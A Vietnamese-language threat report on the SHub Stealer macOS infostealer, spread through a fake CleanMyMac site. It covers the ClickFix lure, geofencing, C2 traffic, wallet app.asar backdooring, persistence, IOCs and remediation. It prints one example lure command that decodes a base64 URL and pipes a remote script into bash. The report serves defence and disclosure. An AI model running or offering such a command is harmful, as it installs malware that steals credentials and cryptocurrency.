Một chiến dịch lừa đảo đang tích cực phân phối mã độc SHub Stealer nguy hiểm nhắm vào người dùng macOS thông qua một trang web giả mạo dịch vụ CleanMyMac. Trang web này, được đặt tại địa chỉ cleanmymacos[.]org, hoàn toàn không có mối liên hệ nào với phần mềm CleanMyMac chính thức hay nhà phát triển MacPaw.

Khi được cài đặt vào hệ thống, SHub Stealer có khả năng thu thập một loạt thông tin nhạy cảm, bao gồm mật khẩu đã lưu, dữ liệu trình duyệt, nội dung Apple Keychain, các tệp ví tiền điện tử và dữ liệu phiên Telegram. Đây là một mối đe dọa nghiêm trọng đối với an toàn thông tin cá nhân và tài sản kỹ thuật số của người dùng.

Phân tích Chiến dịch Tấn công SHub Stealer

Phương thức Lây nhiễm Ban đầu

Chiến dịch này lợi dụng kỹ thuật được gọi là ClickFix. Kỹ thuật này lừa người dùng mở Terminal và dán một lệnh trông có vẻ như là lệnh cài đặt hợp lệ. Người dùng thường bị đánh lừa bởi giao diện và lời kêu gọi hành động trên trang web giả mạo.

Lệnh được dán vào Terminal thực hiện ba hành động chính:

• In ra một liên kết giả mạo MacPaw để tạo vẻ ngoài hợp pháp, đánh lừa người dùng về nguồn gốc của lệnh.
• Giải mã một URL base64 bị ẩn để che giấu điểm đến thực sự của mã độc.
• Tải xuống và thực thi một tập lệnh shell độc hại từ máy chủ của kẻ tấn công.

# Ví dụ về cấu trúc lệnh CLI được sử dụng (minh họa, có thể khác biệt trong thực tế):
echo "Downloading CleanMyMac..." && curl -s "$(echo aHR0cHM6Ly9yZXMyZXJjaC1zbDB1dFsuXWNvbS9kb3dubG9hZC9zaHViLmluc3RhbGw= | base64 -D)" | bash

Cơ chế Vượt qua Bảo mật macOS

Vì người dùng tự thực thi lệnh, các cơ chế phòng thủ của macOS như Gatekeeper, XProtect và các kiểm tra notarization cung cấp rất ít sự bảo vệ. Điều này làm cho mã độc SHub Stealer trở nên đặc biệt nguy hiểm, vì nó bỏ qua các lớp bảo mật tiêu chuẩn mà Apple thiết kế để ngăn chặn các ứng dụng không đáng tin cậy.

Các nhà nghiên cứu tại Malwarebytes đã phân tích toàn bộ chuỗi tấn công và xác định rằng SHub Stealer thuộc về một họ phần mềm đánh cắp thông tin (infostealer) dựa trên AppleScript ngày càng phát triển, bao gồm MacSync Stealer và Odyssey Stealer. Nghiên cứu chi tiết của Malwarebytes đã làm rõ các kỹ thuật phức tạp được sử dụng trong chiến dịch này.

Khả năng và Hoạt động của SHub Stealer

Thu thập Thông tin Đa dạng

SHub Stealer có khả năng thu thập thông tin rộng hơn đáng kể so với các biến thể liên quan. Nó không chỉ đánh cắp mật khẩu và dữ liệu trình duyệt mà còn nhắm mục tiêu vào:

• Nội dung Apple Keychain.
• Các tệp ví tiền điện tử.
• Dữ liệu phiên Telegram.

Chức năng Geofencing

Trước khi triển khai payload chính, một tập lệnh loader sẽ kiểm tra xem bàn phím ngôn ngữ Nga có được cài đặt trên hệ thống hay không. Nếu phát hiện thấy, nó sẽ gửi tín hiệu cis_blocked đến máy chủ của kẻ tấn công và tự thoát mà không thu thập dữ liệu nào.

Hành vi geofencing này là phổ biến trong các loại macOS malware có liên quan đến các mạng lưới tội phạm mạng, nhằm tránh lây nhiễm vào các máy tính trong một số khu vực địa lý nhất định để giảm sự chú ý từ các cơ quan thực thi pháp luật địa phương.

Giao tiếp với Máy chủ Command-and-Control (C2)

Các máy tính vượt qua kiểm tra geofencing sẽ gửi địa chỉ IP, phiên bản macOS và tên máy chủ của chúng đến máy chủ command-and-control (C2) tại res2erch-sl0ut[.]com. Thông tin này giúp kẻ tấn công theo dõi và quản lý các nạn nhân đã bị lây nhiễm.

Mục tiêu và Cơ chế Backdoor Ví Tiền Điện Tử

Điểm làm cho SHub Stealer trở nên nguy hiểm độc đáo là hành động của nó sau khi hoàn thành việc đánh cắp thông tin ban đầu. Nếu nó phát hiện các ứng dụng ví tiền điện tử cụ thể trên máy bị xâm nhập, nó sẽ âm thầm thay thế tệp logic cốt lõi của mỗi ứng dụng bằng một phiên bản đã được backdoor.

Nhận diện Ứng dụng Ví Mục tiêu

Năm ứng dụng ví tiền điện tử được xác nhận là mục tiêu của cuộc tấn công này bao gồm:

• Exodus
• Atomic Wallet
• Ledger Wallet
• Ledger Live
• Trezor Suite

Tất cả các ứng dụng này đều được xây dựng trên Electron, một framework cho ứng dụng desktop nơi hành vi của ứng dụng nằm trong một tệp có tên app.asar.

Kỹ thuật Thay thế Tệp Lõi app.asar

SHub Stealer thực hiện quy trình sau để chèn backdoor vào các ví này:

1. Chấm dứt hoạt động của ứng dụng ví đang chạy.
2. Tải xuống một tệp app.asar đã sửa đổi từ máy chủ C2 của nó.
3. Ghi đè tệp app.asar gốc bằng phiên bản độc hại.
4. Loại bỏ chữ ký mã gốc của ứng dụng.
5. Ký lại ứng dụng để macOS chấp nhận nó như một ứng dụng hợp lệ.

Các ứng dụng đã được backdoor trông và hoạt động bình thường, nhưng chúng âm thầm trích xuất thông tin đăng nhập trong nền. Đây là một phương pháp tinh vi để duy trì sự kiểm soát và tiếp tục đánh cắp dữ liệu mà không gây nghi ngờ cho người dùng.

Cơ chế Exfiltrate Dữ liệu từ Ví

• Exodus và Atomic Wallet: Được cấu hình để âm thầm gửi mật khẩu và cụm từ hạt giống (seed phrase) của người dùng đến wallets-gate[.]io/api/injection mỗi khi ví được mở khóa.
• Ledger Wallet và Ledger Live: Tắt xác thực TLS khi khởi động và hiển thị một trình hướng dẫn khôi phục giả mạo. Trình hướng dẫn này thu thập cụm từ hạt giống trước khi gửi nó đến cùng một endpoint.
• Trezor Suite: Nhận một lớp phủ toàn màn hình được tạo kiểu để phù hợp với giao diện thực của ứng dụng. Nó hiển thị một bản cập nhật bảo mật giả mạo yêu cầu cụm từ hạt giống, xác thực nó bằng thư viện BIP39 của chính ứng dụng, sau đó gửi ra ngoài.

Tất cả năm ứng dụng đã được backdoor đều exfiltrate dữ liệu đến cùng một endpoint wallets-gate[.]io bằng cách sử dụng cùng một API key và ID bản dựng, cho thấy đây là hoạt động của một kẻ tấn công duy nhất.

Persistent Access và IOCs

Cơ chế Duy trì Quyền Truy cập

Để duy trì quyền truy cập lâu dài vào hệ thống bị xâm nhập, SHub Stealer cài đặt một tác vụ nền có tên com.google.keystone.agent.plist trong thư mục ~/Library/LaunchAgents/. Tệp này giả mạo trình cập nhật Keystone của Google và chạy mỗi 60 giây để thực thi các lệnh từ xa, đảm bảo kẻ tấn công có thể kiểm soát liên tục hệ thống. Đây là một kỹ thuật phổ biến của các loại macOS malware nhằm duy trì tính bền bỉ trên hệ thống.

Chỉ số Nhận diện Sự Xâm nhập (IOCs)

Các chỉ số sau đây có thể được sử dụng để phát hiện và ngăn chặn mã độc SHub Stealer:

• Domain giả mạo:cleanmymacos[.]org
• Máy chủ Command-and-Control (C2):res2erch-sl0ut[.]com
• Endpoint exfiltration dữ liệu ví:wallets-gate[.]io/api/injection
• Tệp Persistence LaunchAgent:~/Library/LaunchAgents/com.google.keystone.agent.plist

Khuyến nghị Phòng ngừa và Hành động

Nếu bạn đã từng chạy lệnh Terminal từ trang web cleanmymacos[.]org hoặc nghi ngờ hệ thống của mình đã bị xâm nhập bởi SHub Stealer, hãy thực hiện các hành động ngay lập tức:

• Ngắt kết nối thiết bị khỏi mạng để ngăn chặn việc đánh cắp dữ liệu thêm.
• Thay đổi tất cả mật khẩu quan trọng, đặc biệt là mật khẩu tài khoản ví tiền điện tử và các dịch vụ tài chính.
• Di chuyển tất cả tài sản tiền điện tử đến một ví an toàn khác sau khi hệ thống đã được làm sạch hoàn toàn.
• Sử dụng phần mềm bảo mật đáng tin cậy để quét và loại bỏ mã độc SHub Stealer khỏi hệ thống.
• Khôi phục hệ thống từ một bản sao lưu an toàn trước khi bị lây nhiễm, nếu có thể.
• Kiểm tra thư mục ~/Library/LaunchAgents/ để tìm bất kỳ tệp đáng ngờ nào, đặc biệt là com.google.keystone.agent.plist, và xóa chúng.